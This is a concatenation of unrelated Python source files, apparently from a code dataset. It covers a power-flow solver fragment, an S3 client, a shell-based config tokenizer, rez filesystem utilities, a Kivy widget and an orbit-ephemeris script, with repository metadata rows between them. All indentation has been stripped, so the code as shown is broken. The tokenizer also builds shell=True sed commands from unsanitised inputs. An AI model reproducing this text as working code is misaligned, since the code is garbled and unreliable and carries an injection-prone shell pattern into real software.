print('Ysys:\n', Ysys.todense())
# F = np.zeros(nbus, dtype=complex_type)
# F[Ysh.indices] = Ysh.data
# declare the matrix of coefficients that will lead to the voltage computation
C = zeros((0, nbus), dtype=complex_type)
# auxiliary array for the epsilon algorithm
E_v = zeros((0, nbus), dtype=complex_type)
E_q = zeros((0, npv), dtype=complex_type)
# Declare the inverse coefficients vector
# (it is actually a matrix; a vector of coefficients per coefficient order)
W = zeros((0, npq+npv), dtype=complex_type)
# Reactive power on the PV nodes
Q = zeros((0, npv), dtype=complex_type)
# Squared values of the voltage module for the buses that are not of slack type
Vset_abs2 = abs(voltage_set_points) ** 2
# progressive calculation of coefficients
n = 0
converged = False
inside_precision = True
errors = list()
errors_PV_P = list()
errors_PV_Q = list()
errors_PQ_P = list()
errors_PQ_Q = list()
voltages = list()
Sn_v = zeros(nbus, dtype=complex_type)
Sn_q = zeros(npv, dtype=complex_type)
voltages_vector = zeros(nbus, dtype=complex_type)
Vred_last = zeros(nbus, dtype=complex_type)
solve = factorized(Ysys)
# set the slack indices voltages
voltages_vector[vd] = voltage_set_points[vd]
while n <= max_coefficient_count and not converged and inside_precision:
# Reserve coefficients memory space
C = np.vstack((C, np.zeros((1, nbus), dtype=complex_type)))
E_v = np.vstack((E_v, np.zeros((1, nbus), dtype=complex_type)))
E_q = np.vstack((E_q, np.zeros((1, npv))))
W = np.vstack((W, np.zeros((1, npq+npv), dtype=complex_type)))
Q = np.vstack((Q, np.zeros((1, npv), dtype=complex_type)))
# get the system independent term to solve the coefficients
# n, nbus, F, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w,
rhs, Vre = RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w)
# Solve the linear system to obtain the new coefficients
x_sol = solve(rhs)
# assign the voltages and the reactive power values correctly
C[n, :], Q[n, :] = interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx)
# copy variables for the epsilon algorithm
if not use_pade:
E_v[n, :] = C[n, :]
E_q[n, :] = Q[n, :]
Sn_v += C[n, :]
Sn_q += Q[n, :]
# Update the inverse voltage coefficients W for the non slack nodes
for k in pqpv:
kw = map_w[k] # actual index in the coefficients structure
W[n, kw] = calc_W(n, k, kw, C, W)
# calculate the reactive power
for k in pv:
kk = map_idx[k]
if use_pade:
if mod(n, 2) == 0 and n > 2:
q, _, _ = pade_approximation(n, Q[:, kk])  # use this PV bus's own Q series (mirrors C[:, k] below)
S[k] = S[k].real + 1j * q.real
else:
q, E_q[:, kk] = epsilon(Sn_q[kk], n, E_q[:, kk])
S[k] = S[k].real + 1j * q
# calculate the voltages
for k in pqpv:
if use_pade:
if mod(n, 2) == 0 and n > 2:
v, _, _ = pade_approximation(n, C[:, k])
voltages_vector[k] = v
else:
voltages_vector[k], E_v[:, k] = epsilon(Sn_v[k], n, E_v[:, k])
if np.isnan(voltages_vector[k]):
print('Maximum precision reached at ', n)
voltages_vector = Vred_last
inside_precision = False
break
Vred_last = voltages_vector.copy()
# Compose the voltage values from the coefficient series
voltages.append(voltages_vector.copy())
# print(voltages_vector)
# Calculate the error and check the convergence
Scalc = voltages_vector * conj(Y * voltages_vector)
power_mismatch = Scalc - S # complex power mismatch
power_mismatch_ = r_[power_mismatch[pv].real, power_mismatch[pq].real, power_mismatch[pq].imag] # concatenate error by type
# check for convergence
normF = linalg.norm(power_mismatch_, Inf)
errors.append(normF)
errors_PV_P.append(power_mismatch[pv].real)
errors_PV_Q.append(power_mismatch[pv].imag)
errors_PQ_P.append(power_mismatch[pq].real)
errors_PQ_Q.append(power_mismatch[pq].imag)
if normF < eps:
converged = True
else:
converged = False
n += 1 # increase the coefficients order
# errors_lst = [array(errors), array(errors_PV_P), array(errors_PV_Q), array(errors_PQ_P), array(errors_PQ_Q)]
return Vred_last, converged, normF, Scalc
def bifurcation_point(C, slackIndices):
"""
Computes the bifurcation point
@param C:
@return:
"""
npoints = 100
order_num, bus_num = np.shape(C)
# V(S) = P(S)/Q(S)
V = zeros((npoints, bus_num), dtype=complex_type)
L = zeros((npoints, bus_num))
for k in range(bus_num):
if k not in slackIndices:
_, p, q = pade_approximation(order_num, C[:, k])
# print(k, 'P:', p)
# print(k, 'Q:', q)
asint = np.roots(q[::-1])
asint = np.sort(abs(asint))
asint = asint[asint > 2]
print('Asymptotes', asint)
# print('Asymptote:', asint[0])
bpoint = asint[0]
# bpoint = max(asint)
lmda = np.linspace(1, bpoint, npoints+1)[:-1]
# lmda = np.linspace(1, 100, npoints)
pval = np.polyval(p[::-1], lmda)
qval = np.polyval(q[::-1], lmda)
V[:, k] = pval / qval
L[:, k] = lmda
return V, L
| gpl-3.0 | -1,298,887,950,109,372,700 | 27.421808 | 132 | 0.570116 | false |
RetailMeNot/acky | acky/s3.py | 1 | 4051 | from acky.api import AwsApiClient
try:
from urllib import parse
except ImportError:
import urlparse as parse
class InvalidURL(Exception):
def __init__(self, url, msg=None):
self.url = url
if not msg:
msg = "Invalid URL: {0}".format(url)
super(InvalidURL, self).__init__(msg)
def _parse_url(url=None):
"""Split the path up into useful parts: bucket, obj_key"""
if url is None:
return ('', '')
scheme, netloc, path, _, _ = parse.urlsplit(url)
if scheme != 's3':
raise InvalidURL(url, "URL scheme must be s3://")
if path and not netloc:
raise InvalidURL(url)
return netloc, path[1:]
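# Illustrative behaviour (added for clarity; not part of the original module):
#
#   >>> _parse_url("s3://my-bucket/some/key.txt")
#   ('my-bucket', 'some/key.txt')
#   >>> _parse_url("s3://my-bucket")
#   ('my-bucket', '')
#   >>> _parse_url()
#   ('', '')
#
# A non-s3 scheme (e.g. "http://host/key") raises InvalidURL.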
class S3(AwsApiClient):
"""Interface for managing S3 buckets. (API Version 2006-03-01)"""
service_name = "s3"
def get(self, url=None, delimiter="/"):
"""Path is an s3 url. Ommiting the path or providing "s3://" as the
path will return a list of all buckets. Otherwise, all subdirectories
and their contents will be shown.
"""
params = {'Delimiter': delimiter}
bucket, obj_key = _parse_url(url)
if bucket:
params['Bucket'] = bucket
else:
return self.call("ListBuckets", response_data_key="Buckets")
if obj_key:
params['Prefix'] = obj_key
objects = self.call("ListObjects", response_data_key="Contents",
**params)
if objects:
for obj in objects:
obj['url'] = "s3://{0}/{1}".format(bucket, obj['Key'])
return objects
def create(self, url):
"""Create a bucket, directory, or empty file."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
return self.call("CreateBucket", bucket=target)
def destroy(self, url, recursive=False):
"""Destroy a bucket, directory, or file. Specifying recursive=True
recursively deletes all subdirectories and files."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
if recursive:
for obj in self.get(url, delimiter=''):
self.destroy(obj['url'])
return self.call("DeleteBucket", bucket=target)
def upload(self, local_path, remote_url):
"""Copy a local file to an S3 location."""
bucket, key = _parse_url(remote_url)
with open(local_path, 'rb') as fp:
return self.call("PutObject", bucket=bucket, key=key, body=fp)
def download(self, remote_url, local_path, buffer_size=8 * 1024):
"""Copy S3 data to a local file."""
bucket, key = _parse_url(remote_url)
response_file = self.call("GetObject", bucket=bucket, key=key)['Body']
with open(local_path, 'wb') as fp:
buf = response_file.read(buffer_size)
while buf:
fp.write(buf)
buf = response_file.read(buffer_size)
def copy(self, src_url, dst_url):
"""Copy an S3 object to another S3 location."""
src_bucket, src_key = _parse_url(src_url)
dst_bucket, dst_key = _parse_url(dst_url)
if not dst_bucket:
dst_bucket = src_bucket
params = {
'copy_source': '/'.join((src_bucket, src_key)),
'bucket': dst_bucket,
'key': dst_key,
}
return self.call("CopyObject", **params)
def move(self, src_url, dst_url):
"""Copy a single S3 object to another S3 location, then delete the
original object."""
self.copy(src_url, dst_url)
self.destroy(src_url)
| mit | -417,330,416,866,376,600 | 29.923664 | 78 | 0.555172 | false |
idjaw/dot-manager | app/core/tokenizer.py | 1 | 2196 | from functools import wraps
from re import search
from subprocess import call
from logging import getLogger
from core.exceptions import TokenizationError
log = getLogger("Tokenizer")
def exception_decorator(func):
@wraps(func)
def func_wrapper(*args, **kw):
try:
return func(*args, **kw)
except Exception as e:
log.error("Tokenization failed: {}".format(e))
raise TokenizationError(message=e)
return func_wrapper
class Tokenizer(object):
@exception_decorator
def tokenize(self, file_path, token_list):
log.debug("Tokenizing: {}".format(file_path))
for token in token_list:
call(
'''
sed \
's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1__{0}__/' \
{1} >{1}_new ; mv {1}_new {1}
'''.format(token, file_path),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def replace_tokens_with_actual(self, src_path, tokenized_path, token_list):
token_to_actual_map = self.token_to_actual_data_mapping(
src_path,
token_list
)
for token in token_list:
call(
'''
sed 's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1{2}/' \
{3} >{3}_new ; mv {3}_new {3}
'''.format(
token.strip('_'),
token,
token_to_actual_map.get(token),
tokenized_path
),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def token_to_actual_data_mapping(self, path, token_list):
token_mapper = {}
with open(path) as f:
file_data = f.readlines()
for i in token_list:
stripped = i.strip('_')
for fi in file_data:
matcher = search(
r'({0})\s*=\s*"*(.*[^"*])'.format(stripped), fi
)
if matcher:
token_mapper[i] = matcher.group(2).rstrip()
return token_mapper
| mit | -1,021,853,459,590,033,300 | 29.5 | 80 | 0.473133 | false |
nerdvegas/rez | src/rez/utils/filesystem.py | 1 | 20893 | """
Filesystem-related utilities.
"""
from __future__ import print_function
from threading import Lock
from tempfile import mkdtemp
from contextlib import contextmanager
from uuid import uuid4
import errno
import weakref
import atexit
import posixpath
import ntpath
import os.path
import shutil
import os
import re
import stat
import platform
from rez.vendor.six import six
from rez.utils.platform_ import platform_
is_windows = platform.system() == "Windows"
class TempDirs(object):
"""Tempdir manager.
Makes tmpdirs and ensures they're cleaned up on program exit.
"""
instances_lock = Lock()
instances = []
def __init__(self, tmpdir, prefix="rez_"):
self.tmpdir = tmpdir
self.prefix = prefix
self.dirs = set()
self.lock = Lock()
with TempDirs.instances_lock:
TempDirs.instances.append(weakref.ref(self))
def mkdtemp(self, cleanup=True):
path = mkdtemp(dir=self.tmpdir, prefix=self.prefix)
if not cleanup:
return path
with self.lock:
self.dirs.add(path)
return path
def __del__(self):
self.clear()
def clear(self):
with self.lock:
if not self.dirs:
return
dirs = self.dirs
self.dirs = set()
for path in dirs:
if os.path.exists(path) and not os.getenv("REZ_KEEP_TMPDIRS"):
shutil.rmtree(path)
@classmethod
def clear_all(cls):
with TempDirs.instances_lock:
instances = cls.instances[:]
for ref in instances:
instance = ref()
if instance is not None:
instance.clear()
atexit.register(TempDirs.clear_all)
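# Example usage (added for illustration; not part of the original module):
#
#   import tempfile
#   tmpdirs = TempDirs(tempfile.gettempdir(), prefix="rez_example_")
#   work_dir = tmpdirs.mkdtemp()               # tracked, removed at exit
#   keep_dir = tmpdirs.mkdtemp(cleanup=False)  # caller owns this one
#
# The root directory and prefix above are arbitrary example values.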
@contextmanager
def make_path_writable(path):
"""Temporarily make `path` writable, if possible.
Args:
path (str): Path to make temporarily writable
"""
try:
orig_mode = os.stat(path).st_mode
new_mode = orig_mode
if not os.access(path, os.W_OK):
new_mode = orig_mode | stat.S_IWUSR
# make writable
if new_mode != orig_mode:
os.chmod(path, new_mode)
except OSError:
# ignore access errors here, and just do nothing. It will be more
# intuitive for the calling code to fail on access instead.
#
orig_mode = None
new_mode = None
# yield, then reset mode back to original
try:
yield
finally:
if new_mode != orig_mode:
os.chmod(path, orig_mode)
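# Example usage (added for illustration; not part of the original module):
#
#   with make_path_writable(some_install_dir):
#       write_files_into(some_install_dir)   # hypothetical helper
#
# Inside the block the path is chmod'd user-writable when possible; the
# original mode is restored on exit, and access errors are deliberately
# ignored so the calling code fails on the actual write instead.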
@contextmanager
def retain_cwd():
"""Context manager that keeps cwd unchanged afterwards.
"""
cwd = os.getcwd()
try:
yield
finally:
os.chdir(cwd)
def get_existing_path(path, topmost_path=None):
"""Get the longest parent path in `path` that exists.
If `path` exists, it is returned.
Args:
path (str): Path to test
topmost_path (str): Do not test this path or above
Returns:
str: Existing path, or None if no path was found.
"""
prev_path = None
if topmost_path:
topmost_path = os.path.normpath(topmost_path)
while True:
if os.path.exists(path):
return path
path = os.path.dirname(path)
if path == prev_path:
return None
if topmost_path and os.path.normpath(path) == topmost_path:
return None
prev_path = path
def safe_listdir(path):
"""Safe listdir.
Works in a multithread/proc scenario where dirs may be deleted at any time
"""
try:
return os.listdir(path)
except OSError as e:
if e.errno in (errno.ENOENT, errno.ENOTDIR):
return []
raise
def safe_makedirs(path):
"""Safe makedirs.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError:
if not os.path.exists(path):
raise
def safe_remove(path):
"""Safely remove the given file or directory.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
return
try:
if os.path.isdir(path) and not os.path.islink(path):
shutil.rmtree(path)
else:
os.remove(path)
except OSError:
if os.path.exists(path):
raise
def forceful_rmtree(path):
"""Like shutil.rmtree, but may change permissions.
Specifically, non-writable dirs within `path` can cause rmtree to fail. This
func chmod's to writable to avoid this issue, if possible.
Also handled:
* path length over 259 char (on Windows)
* unicode path
"""
if six.PY2:
path = unicode(path)
def _on_error(func, path, exc_info):
try:
if is_windows:
path = windows_long_path(path)
parent_path = os.path.dirname(path)
if not os.access(parent_path, os.W_OK):
st = os.stat(parent_path)
os.chmod(parent_path, st.st_mode | stat.S_IWUSR)
if not os.access(path, os.W_OK):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IWUSR)
except:
# avoid confusion by ensuring original exception is reraised
pass
func(path)
shutil.rmtree(path, onerror=_on_error)
def replacing_symlink(source, link_name):
"""Create symlink that overwrites any existing target.
"""
with make_tmp_name(link_name) as tmp_link_name:
os.symlink(source, tmp_link_name)
replace_file_or_dir(link_name, tmp_link_name)
def replacing_copy(src, dest, follow_symlinks=False):
"""Perform copy that overwrites any existing target.
Will copy/copytree `src` to `dest`, and will remove `dest` if it exists,
regardless of what it is.
If `follow_symlinks` is False, symlinks are preserved, otherwise their
contents are copied.
Note that this behavior is different to `shutil.copy`, which copies src
into dest if dest is an existing dir.
"""
with make_tmp_name(dest) as tmp_dest:
if os.path.islink(src) and not follow_symlinks:
# special case - copy just a symlink
src_ = os.readlink(src)
os.symlink(src_, tmp_dest)
elif os.path.isdir(src):
# copy a dir
shutil.copytree(src, tmp_dest, symlinks=(not follow_symlinks))
else:
# copy a file
shutil.copy2(src, tmp_dest)
replace_file_or_dir(dest, tmp_dest)
def replace_file_or_dir(dest, source):
"""Replace `dest` with `source`.
Acts like an `os.rename` if `dest` does not exist. Otherwise, `dest` is
deleted and `src` is renamed to `dest`.
"""
from rez.vendor.atomicwrites import replace_atomic
if not os.path.exists(dest):
try:
os.rename(source, dest)
return
except:
if not os.path.exists(dest):
raise
try:
replace_atomic(source, dest)
return
except:
pass
with make_tmp_name(dest) as tmp_dest:
os.rename(dest, tmp_dest)
os.rename(source, dest)
def additive_copytree(src, dst, symlinks=False, ignore=None):
"""Version of `copytree` that merges into an existing directory.
"""
if not os.path.exists(dst):
os.makedirs(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
additive_copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
@contextmanager
def make_tmp_name(name):
"""Generates a tmp name for a file or dir.
This is a tempname that sits in the same dir as `name`. If it exists on
disk at context exit time, it is deleted.
"""
path, base = os.path.split(name)
# there's a reason this isn't a hidden file:
# https://github.com/nerdvegas/rez/pull/1088
#
tmp_base = "_tmp-%s-%s" % (base, uuid4().hex)
tmp_name = os.path.join(path, tmp_base)
try:
yield tmp_name
finally:
safe_remove(tmp_name)
def is_subdirectory(path_a, path_b):
"""Returns True if `path_a` is a subdirectory of `path_b`."""
path_a = os.path.realpath(path_a)
path_b = os.path.realpath(path_b)
try:
relative = os.path.relpath(path_a, path_b)
except ValueError:
# Different mounts on Windows:
# ValueError: path is on mount 'c:', start on mount 'd:'
#
return False
return not relative.startswith(os.pardir + os.sep)
def find_matching_symlink(path, source):
"""Find a symlink under `path` that points at `source`.
If source is relative, it is considered relative to `path`.
Returns:
str: Name of symlink found, or None.
"""
def to_abs(target):
if os.path.isabs(target):
return target
else:
return os.path.normpath(os.path.join(path, target))
abs_source = to_abs(source)
for name in os.listdir(path):
linkpath = os.path.join(path, name)
if os.path.islink(linkpath):
source_ = os.readlink(linkpath)
if to_abs(source_) == abs_source:
return name
return None
def copy_or_replace(src, dst):
'''try to copy with mode, and if it fails, try replacing
'''
try:
shutil.copy(src, dst)
except (OSError, IOError) as e:
# It's possible that the file existed, but was owned by someone
# else - in that situation, shutil.copy might then fail when it
# tries to copy perms.
# However, it's possible that we have write perms to the dir -
# in which case, we can just delete and replace
import errno
if e.errno == errno.EPERM:
import tempfile
# try copying into a temporary location beside the old
# file - if we have perms to do that, we should have perms
# to then delete the old file, and move the new one into
# place
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
dst_dir, dst_name = os.path.split(dst)
dst_temp = tempfile.mktemp(prefix=dst_name + '.', dir=dst_dir)
shutil.copy(src, dst_temp)
if not os.path.isfile(dst_temp):
raise RuntimeError(
"shutil.copy completed successfully, but path"
" '%s' still did not exist" % dst_temp)
os.remove(dst)
shutil.move(dst_temp, dst)
def copytree(src, dst, symlinks=False, ignore=None, hardlinks=False):
'''copytree that supports hard-linking
'''
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if hardlinks:
def copy(srcname, dstname):
try:
# try hard-linking first
os.link(srcname, dstname)
except OSError:
shutil.copy2(srcname, dstname)
else:
copy = shutil.copy2
if not os.path.isdir(dst):
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, ignore)
else:
copy(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error) as why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except shutil.Error as err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except shutil.WindowsError:
# can't copy file access times on Windows
pass
except OSError as why:
errors.extend((src, dst, str(why)))
if errors:
raise shutil.Error(errors)
def movetree(src, dst):
"""Attempts a move, and falls back to a copy+delete if this fails
"""
try:
shutil.move(src, dst)
except:
copytree(src, dst, symlinks=True, hardlinks=True)
shutil.rmtree(src)
def safe_chmod(path, mode):
"""Set the permissions mode on path, but only if it differs from the current mode.
"""
if stat.S_IMODE(os.stat(path).st_mode) != mode:
os.chmod(path, mode)
def to_nativepath(path):
path = path.replace('\\', '/')
return os.path.join(*path.split('/'))
def to_ntpath(path):
return ntpath.sep.join(path.split(posixpath.sep))
def to_posixpath(path):
return posixpath.sep.join(path.split(ntpath.sep))
def canonical_path(path, platform=None):
""" Resolves symlinks, and formats filepath.
Resolves symlinks, lowercases if filesystem is case-insensitive,
formats filepath using slashes appropriate for platform.
Args:
path (str): Filepath being formatted
platform (rez.utils.platform_.Platform): Indicates platform path is being
formatted for. Defaults to current platform.
Returns:
str: Provided path, formatted for platform.
"""
if platform is None:
platform = platform_
path = os.path.normpath(os.path.realpath(path))
if not platform.has_case_sensitive_filesystem:
return path.lower()
return path
def encode_filesystem_name(input_str):
"""Encodes an arbitrary unicode string to a generic filesystem-compatible
non-unicode filename.
The result after encoding will only contain the standard ascii lowercase
letters (a-z), the digits (0-9), or periods, underscores, or dashes
(".", "_", or "-"). No uppercase letters will be used, for
compatibility with case-insensitive filesystems.
The rules for the encoding are:
1) Any lowercase letter, digit, period, or dash (a-z, 0-9, ., or -) is
encoded as-is.
2) Any underscore is encoded as a double-underscore ("__")
3) Any uppercase ascii letter (A-Z) is encoded as an underscore followed
by the corresponding lowercase letter (ie, "A" => "_a")
4) All other characters are encoded using their UTF-8 encoded unicode
representation, in the following format: "_NHH..., where:
a) N represents the number of bytes needed for the UTF-8 encoding,
except with N=0 for one-byte representation (the exception for N=1
is made both because it means that for "standard" ascii characters
in the range 0-127, their encoding will be _0xx, where xx is their
ascii hex code; and because it mirrors the ways UTF-8 encoding
itself works, where the number of bytes needed for the character can
be determined by counting the number of leading "1"s in the binary
representation of the character, except that if it is a 1-byte
sequence, there are 0 leading 1's).
b) HH represents the bytes of the corresponding UTF-8 encoding, in
hexadecimal (using lower-case letters)
As an example, the character "*", whose (hex) UTF-8 representation
of 2A, would be encoded as "_02a", while the "euro" symbol, which
has a UTF-8 representation of E2 82 AC, would be encoded as
"_3e282ac". (Note that, strictly speaking, the "N" part of the
encoding is redundant information, since it is essentially encoded
in the UTF-8 representation itself, but it makes the resulting
string more human-readable, and easier to decode).
As an example, the string "Foo_Bar (fun).txt" would get encoded as:
_foo___bar_020_028fun_029.txt
"""
if isinstance(input_str, six.string_types):
input_str = unicode(input_str)
elif not isinstance(input_str, unicode):
raise TypeError("input_str must be a %s" % six.string_types[0].__name__)
as_is = u'abcdefghijklmnopqrstuvwxyz0123456789.-'
uppercase = u'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
result = []
for char in input_str:
if char in as_is:
result.append(char)
elif char == u'_':
result.append('__')
elif char in uppercase:
result.append('_%s' % char.lower())
else:
utf8 = char.encode('utf8')
N = len(utf8)
if N == 1:
N = 0
HH = ''.join('%x' % ord(c) for c in utf8)
result.append('_%d%s' % (N, HH))
return ''.join(result)
_FILESYSTEM_TOKEN_RE = re.compile(r'(?P<as_is>[a-z0-9.-])|(?P<underscore>__)|_(?P<uppercase>[a-z])|_(?P<N>[0-9])')
_HEX_RE = re.compile('[0-9a-f]+$')
def decode_filesystem_name(filename):
"""Decodes a filename encoded using the rules given in encode_filesystem_name
to a unicode string.
"""
result = []
remain = filename
i = 0
while remain:
# use match, to ensure it matches from the start of the string...
match = _FILESYSTEM_TOKEN_RE.match(remain)
if not match:
raise ValueError("incorrectly encoded filesystem name %r"
" (bad index: %d - %r)" % (filename, i,
remain[:2]))
match_str = match.group(0)
match_len = len(match_str)
i += match_len
remain = remain[match_len:]
match_dict = match.groupdict()
if match_dict['as_is']:
result.append(unicode(match_str))
elif match_dict['underscore']:
result.append(u'_')
elif match_dict['uppercase']:
result.append(unicode(match_dict['uppercase'].upper()))
elif match_dict['N']:
N = int(match_dict['N'])
if N == 0:
N = 1
# hex-encoded, so need to grab 2*N chars
bytes_len = 2 * N
i += bytes_len
bytes = remain[:bytes_len]
remain = remain[bytes_len:]
# need this check to ensure that we don't end up eval'ing
# something nasty...
if not _HEX_RE.match(bytes):
raise ValueError("Bad utf8 encoding in name %r"
" (bad index: %d - %r)" % (filename, i, bytes))
bytes_repr = ''.join('\\x%s' % bytes[i:i + 2]
for i in xrange(0, bytes_len, 2))
bytes_repr = "'%s'" % bytes_repr
result.append(eval(bytes_repr).decode('utf8'))
else:
raise ValueError("Unrecognized match type in filesystem name %r"
" (bad index: %d - %r)" % (filename, i, remain[:2]))
return u''.join(result)
def test_encode_decode():
def do_test(orig, expected_encoded):
print('=' * 80)
print(orig)
encoded = encode_filesystem_name(orig)
print(encoded)
assert encoded == expected_encoded
decoded = decode_filesystem_name(encoded)
print(decoded)
assert decoded == orig
do_test("Foo_Bar (fun).txt", '_foo___bar_020_028fun_029.txt')
# u'\u20ac' == Euro symbol
do_test(u"\u20ac3 ~= $4.06", '_3e282ac3_020_07e_03d_020_0244.06')
def walk_up_dirs(path):
"""Yields absolute directories starting with the given path, and iterating
up through all it's parents, until it reaches a root directory"""
prev_path = None
current_path = os.path.abspath(path)
while current_path != prev_path:
yield current_path
prev_path = current_path
current_path = os.path.dirname(prev_path)
def windows_long_path(dos_path):
"""Prefix '\\?\' for path longer than 259 char (Win32API limitation)
"""
path = os.path.abspath(dos_path)
if path.startswith("\\\\?\\"):
pass
elif path.startswith("\\\\"):
path = "\\\\?\\UNC\\" + path[2:]
else:
path = "\\\\?\\" + path
return path
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | -2,403,405,377,951,893,000 | 28.677557 | 114 | 0.59441 | false |
victor-rene/kivy-test | gui/reportcell.py | 1 | 1576 | from kivy.graphics import Color, Rectangle
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.widget import Widget
class ReportCell(BoxLayout):
def __init__(self, **kw):
super(ReportCell, self).__init__(**kw)
self.data = kw['data']
with self.canvas.before:
a = .5
b = .3
Color(b, a, b, 1.)
self.rect_run = Rectangle()
Color(a, b, b, 1.)
self.rect_miss = Rectangle()
Color(b, b, a, 1.)
self.rect_excl = Rectangle()
lbl = Label(size_hint=(1, 1))
lbl.text = '%s %s (%s/%s)' % (self.data[0], self.data[3], self.data[1],
self.data[2])
self.add_widget(lbl)
self.bind(pos=self._update_rect, size=self._update_rect)
def _update_rect(self, *args):
h = self.height
w = self.width
if float(self.data[1]) == 0.:
return
run_pct = (float(self.data[1]) - float(self.data[2])) / float(self.data[1])
miss_pct = float(self.data[2]) / float(self.data[1])
excl_pct = 1. - run_pct - miss_pct
# print run_pct, miss_pct, excl_pct
self.rect_run.pos = self.pos
self.rect_run.size = w * run_pct, h
self.rect_miss.pos = self.rect_run.pos[0] + self.rect_run.size[0], self.rect_run.pos[1]
self.rect_miss.size = w * miss_pct, h
self.rect_excl.pos = self.rect_miss.pos[0] + self.rect_miss.size[0], self.rect_miss.pos[1]
self.rect_excl.size = w * excl_pct, h
| mit | -8,431,501,857,110,692,000 | 36.547619 | 98 | 0.541244 | false |
EUPSForge/oorb | python/test_2.py | 1 | 4840 | import os
import subprocess
import numpy as np
import matplotlib.pyplot as plt
from itertools import repeat
import pandas as pd
import pyoorb as oo
import time
def dtime(time_prev):
return (time.time() - time_prev, time.time())
def pack_oorbArray(orbits):
"""Translate orbital element dictionary (easy for humans) into pyoorb-suitable input orbit array."""
# Translate orbital elements into array that pyoorb will like.
# PyOrb wants ::
# 0: orbitId
# 1 - 6: orbital elements, using radians for angles
# 7: element type code, where 2 = cometary - means timescale is TT, too
# 8: epoch
# 9: timescale for the epoch; 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
# 10: magHv
# 11: G
elem_type = np.zeros(len(orbits)) + 2
epoch_type = np.zeros(len(orbits)) + 3
gval = np.zeros(len(orbits)) + 0.15
# Also, the orbitID has to be a float, rather than a string, so substitute if needed.
if ((isinstance(orbits['objid'][0], float) == True) |
(isinstance(orbits['objid'][0], int) == True)):
orbids = orbits['objid']
else:
orbids = np.arange(0, len(orbits['objid']), 1)
# Convert to format for pyoorb, INCLUDING converting inclination, node, argperi to RADIANS
oorbArray = np.column_stack((orbids, orbits['q'], orbits['e'], np.radians(orbits['i']),
np.radians(orbits['node']), np.radians(orbits['argperi']),
orbits['t_p'], elem_type, orbits['t_0'], epoch_type, orbits['H'], gval))
return oorbArray
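# --- Illustrative example (added; the numbers are made up, not real orbits) ---
# pack_oorbArray expects a table-like object (e.g. a pandas DataFrame) with the
# columns used above, so a tiny hand-built frame is enough to exercise it:
#
#   fake_orbits = pd.DataFrame({'objid': [1.0], 'q': [2.5], 'e': [0.1],
#                               'i': [5.0], 'node': [110.0], 'argperi': [30.0],
#                               't_p': [56000.0], 't_0': [56000.0], 'H': [18.0]})
#   packed = pack_oorbArray(fake_orbits)  # -> (1, 12) array, angles in radians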
if __name__ == "__main__":
t = time.time()
print "starting..."
# check against OpenOrb command line
timespan = 1000
timestep = 10
command = "/bin/rm test_out ; oorb --code=807 --task=ephemeris --orb-in=test_orbits.des --timespan=%d --step=%d > test_out" %(timespan, timestep)
print command
subprocess.call(command, shell=True)
dt, t = dtime(t)
print "Calculating ephemerides by command line took %f s "%(dt)
# Read the command line version back, to look for differences.
data = pd.read_table('test_out', sep="\s*", engine='python')
dt, t = dtime(t)
print "Reading data back from file %f s" %(dt)
print "Read %d ephemerides" %(len(data['RA']))
ctimes = data['MJD_UTC/UT1'][data['#Designation'] == 1]
print "Created %d unique times; %d times total" %(len(np.unique(data['MJD_UTC/UT1'])), len(ctimes))
# Read the orbits from disk.
dt, t = dtime(t)
orbits = pd.read_table('test_orbits.des', sep='\s*', engine='python')
newcols = orbits.columns.values
newcols[0] = 'objid'
orbits.columns = newcols
dt, t = dtime(t)
print "Reading %d orbits required %f s" %(len(orbits['q']), dt)
# convert orbit array to 'packed' form needed in oorb.
oorbArray = pack_oorbArray(orbits)
# set up oorb.
ephfile = os.path.join(os.getenv('OORB_DATA'), 'de430.dat')
oo.pyoorb.oorb_init(ephemeris_fname=ephfile)
# set observatory code
obscode = 807
# Set up dates to predict ephemerides.
timestart = orbits['t_0'][0]
times = np.arange(timestart, timestart + timespan + timestep/2.0, timestep)
times = np.array(ctimes)
# For pyoorb, we need to tag times with timescales;
# 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
